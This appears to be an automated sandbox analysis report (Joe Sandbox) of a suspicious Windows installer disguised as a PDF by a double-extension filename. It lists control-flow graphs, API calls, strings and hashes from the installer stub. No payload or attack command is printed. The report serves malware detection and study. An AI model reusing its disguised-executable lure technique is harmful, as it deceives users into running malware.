                    control_flow_graph 133 403cad-403cbf 134 403e00-403e0f 133->134 135 403cc5-403ccb 133->135 137 403e11-403e59 GetDlgItem * 2 call 404185 SetClassLongW call 40140b 134->137 138 403e5e-403e73 134->138 135->134 136 403cd1-403cda 135->136 141 403cdc-403ce9 SetWindowPos 136->141 142 403cef-403cf2 136->142 137->138 139 403eb3-403eb8 call 4041d1 138->139 140 403e75-403e78 138->140 152 403ebd-403ed8 139->152 144 403e7a-403e85 call 401389 140->144 145 403eab-403ead 140->145 141->142 147 403cf4-403d06 ShowWindow 142->147 148 403d0c-403d12 142->148 144->145 166 403e87-403ea6 SendMessageW 144->166 145->139 151 404152 145->151 147->148 153 403d14-403d29 DestroyWindow 148->153 154 403d2e-403d31 148->154 163 404154-40415b 151->163 161 403ee1-403ee7 152->161 162 403eda-403edc call 40140b 152->162 156 40412f-404135 153->156 158 403d33-403d3f SetWindowLongW 154->158 159 403d44-403d4a 154->159 156->151 167 404137-40413d 156->167 158->163 164 403d50-403d61 GetDlgItem 159->164 165 403ded-403dfb call 4041ec 159->165 169 404110-404129 DestroyWindow EndDialog 161->169 170 403eed-403ef8 161->170 162->161 171 403d80-403d83 164->171 172 403d63-403d7a SendMessageW IsWindowEnabled 164->172 165->163 166->163 167->151 174 40413f-404148 ShowWindow 167->174 169->156 170->169 175 403efe-403f4b call 4060e3 call 404185 * 3 GetDlgItem 170->175 177 403d85-403d86 171->177 178 403d88-403d8b 171->178 172->151 172->171 174->151 203 403f55-403f91 ShowWindow KiUserCallbackDispatcher call 4041a7 EnableWindow 175->203 204 403f4d-403f52 175->204 181 403db6-403dbb call 40415e 177->181 182 403d99-403d9e 178->182 183 403d8d-403d93 178->183 181->165 186 403dd4-403de7 SendMessageW 182->186 188 403da0-403da6 182->188 183->186 187 403d95-403d97 183->187 186->165 187->181 191 403da8-403dae call 40140b 188->191 192 403dbd-403dc6 call 40140b 188->192 201 403db4 191->201 192->165 200 403dc8-403dd2 192->200 200->201 201->181 207 403f93-403f94 203->207 208 403f96 203->208 204->203 209 403f98-403fc6 GetSystemMenu EnableMenuItem SendMessageW 207->209 208->209 210 403fc8-403fd9 SendMessageW 209->210 211 403fdb 209->211 212 403fe1-40401f call 4041ba call 4060c1 lstrlenW call 4060e3 SetWindowTextW call 401389 210->212 211->212 212->152 221 404025-404027 212->221 221->152 222 40402d-404031 221->222 223 404050-404064 DestroyWindow 222->223 224 404033-404039 222->224 223->156 225 40406a-404097 CreateDialogParamW 223->225 224->151 226 40403f-404045 224->226 225->156 227 40409d-4040f4 call 404185 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->152 228 40404b 226->228 227->151 233 4040f6-404109 ShowWindow call 4041d1 227->233 228->151 235 40410e 233->235 235->156
                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE9
                    • ShowWindow.USER32(?), ref: 00403D06
                    • DestroyWindow.USER32 ref: 00403D1A
                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D36
                    • GetDlgItem.USER32(?,?), ref: 00403D57
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D6B
                    • IsWindowEnabled.USER32(00000000), ref: 00403D72
                    • GetDlgItem.USER32(?,00000001), ref: 00403E20
                    • GetDlgItem.USER32(?,00000002), ref: 00403E2A
                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403E44
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E95
                    • GetDlgItem.USER32(?,00000003), ref: 00403F3B
                    • ShowWindow.USER32(00000000,?), ref: 00403F5C
                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F6E
                    • EnableWindow.USER32(?,?), ref: 00403F89
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F9F
                    • EnableMenuItem.USER32(00000000), ref: 00403FA6
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FBE
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FD1
                    • lstrlenW.KERNEL32(007A1F20,?,007A1F20,007A7A20), ref: 00403FFA
                    • SetWindowTextW.USER32(?,007A1F20), ref: 0040400E
                    • ShowWindow.USER32(?,0000000A), ref: 00404142
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID:
                    • API String ID: 3282139019-0
                    • Opcode ID: aafb21cce241bd3422346a601cfa9bdf3d9b5db9db0e3f237e977f240631d110
                    • Instruction ID: 2fdfadb1b5313d8de23c737a6981c36fc239097adb6e13b2960366b833a5549f
                    • Opcode Fuzzy Hash: aafb21cce241bd3422346a601cfa9bdf3d9b5db9db0e3f237e977f240631d110
                    • Instruction Fuzzy Hash: 82C1CEB2504204EFDB206F21ED89E2B3A69EB96705F00853EF651B51F0CB3D9891DB1E
                    Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 236 40390a-403922 call 40649b 239 403924-403934 call 406008 236->239 240 403936-40396d call 405f8e 236->240 249 403990-4039b9 call 403be0 call 405b7d 239->249 245 403985-40398b lstrcatW 240->245 246 40396f-403980 call 405f8e 240->246 245->249 246->245 254 403a4b-403a53 call 405b7d 249->254 255 4039bf-4039c4 249->255 261 403a61-403a86 LoadImageW 254->261 262 403a55-403a5c call 4060e3 254->262 255->254 256 4039ca-4039f2 call 405f8e 255->256 256->254 263 4039f4-4039f8 256->263 265 403b07-403b0f call 40140b 261->265 266 403a88-403ab8 RegisterClassW 261->266 262->261 267 403a0a-403a16 lstrlenW 263->267 268 4039fa-403a07 call 405aa2 263->268 280 403b11-403b14 265->280 281 403b19-403b24 call 403be0 265->281 269 403bd6 266->269 270 403abe-403b02 SystemParametersInfoW CreateWindowExW 266->270 274 403a18-403a26 lstrcmpiW 267->274 275 403a3e-403a46 call 405a75 call 4060c1 267->275 268->267 273 403bd8-403bdf 269->273 270->265 274->275 279 403a28-403a32 GetFileAttributesW 274->279 275->254 284 403a34-403a36 279->284 285 403a38-403a39 call 405ac1 279->285 280->273 289 403b2a-403b44 ShowWindow call 40642b 281->289 290 403bad-403bb5 call 4052f3 281->290 284->275 284->285 285->275 297 403b50-403b62 GetClassInfoW 289->297 298 403b46-403b4b call 40642b 289->298 295 403bb7-403bbd 290->295 296 403bcf-403bd1 call 40140b 290->296 295->280 299 403bc3-403bca call 40140b 295->299 296->269 302 403b64-403b74 GetClassInfoW RegisterClassW 297->302 303 403b7a-403b9d DialogBoxParamW call 40140b 297->303 298->297 299->280 302->303 307 403ba2-403bab call 40385a 303->307 307->273
                    APIs
                      • Part of subcall function 0040649B: GetModuleHandleA.KERNEL32(?,00000020,?,0040337A,00000009), ref: 004064AD
                      • Part of subcall function 0040649B: GetProcAddress.KERNEL32(00000000,?), ref: 004064C8
                    • lstrcatW.KERNEL32(1033,007A1F20), ref: 0040398B
                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\twinsomeness,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,771B3420), ref: 00403A0B
                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\twinsomeness,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A1E
                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A29
                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\twinsomeness), ref: 00403A72
                      • Part of subcall function 00406008: wsprintfW.USER32 ref: 00406015
                    • RegisterClassW.USER32(007A79C0), ref: 00403AAF
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403AC7
                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AFC
                    • ShowWindow.USER32(00000005,00000000), ref: 00403B32
                    • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403B5E
                    • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403B6B
                    • RegisterClassW.USER32(007A79C0), ref: 00403B74
                    • DialogBoxParamW.USER32(?,00000000,00403CAD,00000000), ref: 00403B93
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\twinsomeness$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 1975747703-716419000
                    • Opcode ID: 1c91817c6d422e2bf7344803dbed09d3f1d01b7940f7d5e81b4c7eea282cc87f
                    • Instruction ID: 01d9be229e4668e71e20a61315ff8562772da1c974f0f981348189b6b31dac12
                    • Opcode Fuzzy Hash: 1c91817c6d422e2bf7344803dbed09d3f1d01b7940f7d5e81b4c7eea282cc87f
                    • Instruction Fuzzy Hash: D66182702406046ED620AF669D45F2B3A6CEBC5749F40853FF981B62E2DB7D6901CB2D
                    Function 00402E82 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 310 402e82-402ed0 GetTickCount GetModuleFileNameW call 405c96 313 402ed2-402ed7 310->313 314 402edc-402f0a call 4060c1 call 405ac1 call 4060c1 GetFileSize 310->314 315 4030b4-4030b8 313->315 322 402f10 314->322 323 402ff7-403005 call 402e1e 314->323 324 402f15-402f2c 322->324 329 403007-40300a 323->329 330 40305a-40305f 323->330 326 402f30-402f39 call 4032b3 324->326 327 402f2e 324->327 336 403061-403069 call 402e1e 326->336 337 402f3f-402f46 326->337 327->326 332 40300c-403024 call 4032c9 call 4032b3 329->332 333 40302e-403058 GlobalAlloc call 4032c9 call 4030bb 329->333 330->315 332->330 356 403026-40302c 332->356 333->330 361 40306b-40307c 333->361 336->330 340 402fc2-402fc6 337->340 341 402f48-402f5c call 405c51 337->341 345 402fd0-402fd6 340->345 346 402fc8-402fcf call 402e1e 340->346 341->345 359 402f5e-402f65 341->359 352 402fe5-402fef 345->352 353 402fd8-402fe2 call 40654c 345->353 346->345 352->324 360 402ff5 352->360 353->352 356->330 356->333 359->345 365 402f67-402f6e 359->365 360->323 362 403084-403089 361->362 363 40307e 361->363 366 40308a-403090 362->366 363->362 365->345 367 402f70-402f77 365->367 366->366 368 403092-4030ad SetFilePointer call 405c51 366->368 367->345 369 402f79-402f80 367->369 372 4030b2 368->372 369->345 371 402f82-402fa2 369->371 371->330 373 402fa8-402fac 371->373 372->315 374 402fb4-402fbc 373->374 375 402fae-402fb2 373->375 374->345 376 402fbe-402fc0 374->376 375->360 375->374 376->345
                    APIs
                    • GetTickCount.KERNEL32 ref: 00402E93
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,00000400,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00402EAF
                      • Part of subcall function 00405C96: GetFileAttributesW.KERNELBASE(00000003,00402EC2,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405C9A
                      • Part of subcall function 00405C96: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405CBC
                    • GetFileSize.KERNEL32(00000000,00000000,BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00402EFB
                    Strings
                    • soft, xrefs: 00402F70
                    • "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe", xrefs: 00402E82
                    • BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, xrefs: 00402EEF
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040305A
                    • Inst, xrefs: 00402F67
                    • C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, xrefs: 00402E99, 00402EA8, 00402EBC, 00402EDC
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402E89
                    • vy, xrefs: 00402F10
                    • C:\Users\user\Desktop, xrefs: 00402EDD, 00402EE2, 00402EE8
                    • Null, xrefs: 00402F79
                    • Error launching installer, xrefs: 00402ED2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                    • API String ID: 4283519449-2165270830
                    • Opcode ID: c99fccee82025c9b8ff51491df089153cdc3dcd4b8e29654562b84dd18f8e830
                    • Instruction ID: 48e7e34c2b017b792b8509286a2adfca438118cc3a200129a79ef70b2a7409b7
                    • Opcode Fuzzy Hash: c99fccee82025c9b8ff51491df089153cdc3dcd4b8e29654562b84dd18f8e830
                    • Instruction Fuzzy Hash: 4051E371901209ABDB109F65DE89B9E7BB8EB10355F14813FF900B22D1DB7C8E809B5D
                    Function 00405220 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 503 405220-405235 504 40523b-40524c 503->504 505 4052ec-4052f0 503->505 506 405257-405263 lstrlenW 504->506 507 40524e-405252 call 4060e3 504->507 509 405280-405284 506->509 510 405265-405275 lstrlenW 506->510 507->506 512 405293-405297 509->512 513 405286-40528d SetWindowTextW 509->513 510->505 511 405277-40527b lstrcatW 510->511 511->509 514 405299-4052db SendMessageW * 3 512->514 515 4052dd-4052df 512->515 513->512 514->515 515->505 516 4052e1-4052e4 515->516 516->505
                    APIs
                    • lstrlenW.KERNEL32(udvistes,00000000,00796DF3,771B23A0,?,?,?,?,?,?,?,?,?,004031FC,00000000,?), ref: 00405258
                    • lstrlenW.KERNEL32(004031FC,udvistes,00000000,00796DF3,771B23A0,?,?,?,?,?,?,?,?,?,004031FC,00000000), ref: 00405268
                    • lstrcatW.KERNEL32(udvistes,004031FC), ref: 0040527B
                    • SetWindowTextW.USER32(udvistes,udvistes), ref: 0040528D
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052B3
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052CD
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                    • String ID: udvistes
                    • API String ID: 2531174081-1288086289
                    • Opcode ID: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                    • Instruction ID: 98799ecbbdae69ecf8805142924c7471705cc156238751a5c8a42c2ad73b3a7a
                    • Opcode Fuzzy Hash: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                    • Instruction Fuzzy Hash: 5B217C71900618BBCB119FA5DD85ADFBFB8EF85354F10807AF944B62A0C7794A50CFA8
                    Function 004056EF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 517 4056ef-40573a CreateDirectoryW 518 405740-40574d GetLastError 517->518 519 40573c-40573e 517->519 520 405767-405769 518->520 521 40574f-405763 SetFileSecurityW 518->521 519->520 521->519 522 405765 GetLastError 521->522 522->520
                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405732
                    • GetLastError.KERNEL32 ref: 00405746
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040575B
                    • GetLastError.KERNEL32 ref: 00405765
                    Strings
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405715
                    • C:\Users\user\Desktop, xrefs: 004056EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                    • API String ID: 3449924974-2752704311
                    • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                    • Instruction ID: 6c42f7b7b9652fd6c04dce52b4264f7fa901b92340194c0b39f9bda142b0fdef
                    • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                    • Instruction Fuzzy Hash: CA011A71D00219DADF019FA0CE447EFBBB8EF14358F00403AE544B6180D7789604DFA9
                    Function 0040642B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 523 40642b-40644b GetSystemDirectoryW 524 40644d 523->524 525 40644f-406451 523->525 524->525 526 406462-406464 525->526 527 406453-40645c 525->527 529 406465-406498 wsprintfW LoadLibraryExW 526->529 527->526 528 40645e-406460 527->528 528->529
                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406442
                    • wsprintfW.USER32 ref: 0040647D
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406491
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
